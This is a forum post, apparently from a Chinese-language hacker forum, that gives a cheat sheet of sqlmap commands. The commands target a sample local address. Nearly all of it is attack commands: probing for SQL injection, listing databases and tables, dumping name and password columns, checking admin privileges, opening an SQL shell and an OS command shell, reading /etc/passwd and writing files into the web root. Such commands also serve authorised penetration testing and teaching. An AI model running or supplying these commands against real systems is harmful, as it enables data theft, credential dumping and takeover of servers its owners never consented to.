• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Sqlmap必备的命令,你学会了吗?


This Wind

Recommended Posts

Sqlmap是一个专业的SQL注入工具,用法也很多,具体可以用"sqlmap -hh"查看完整的命令帮助文档,我这只是给大家分享一些最常用的Sqlmap用法:

 

一、Sqlmap注入篇

 

1、检查注入点

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆所有数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆当前数据库信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列出指定数据库所有的表名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

'fujieace' 为指定数据库名称

 

4、列出指定表名的所有列名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

'admin' 为指定表名称

 

5、dump打印输出表名指定列名字段的值数据

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

'name,password' 为指定字段名称

 

二、Sqlmap用户权限篇

 

1、列出数据库管理系统用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查看当前连接数据库用户:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、判断当前用户是否是DBA?

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查看用户权限:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap文件操作与shell提权篇

 

1、sql shell

这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;

 

2、cmd shell

这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、读取服务器上指定文件

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、写入本地文件到服务器上

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now